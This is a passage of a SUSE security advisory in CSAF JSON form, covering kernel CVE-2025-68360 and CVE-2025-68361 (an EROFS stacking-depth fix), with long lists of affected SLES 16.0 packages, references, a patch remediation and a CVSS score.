"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68360"
},
{
"cve": "CVE-2025-68361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68361"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: limit the level of fs stacking for file-backed mounts\n\nOtherwise, it could cause potential kernel stack overflow (e.g., EROFS\nmounting itself).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68361",
"url": "https://www.suse.com/security/cve/CVE-2025-68361"
},
{
"category": "external",
"summary": "SUSE Bug 1255526 for CVE-2025-68361",
"url": "https://bugzilla.suse.com/1255526"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
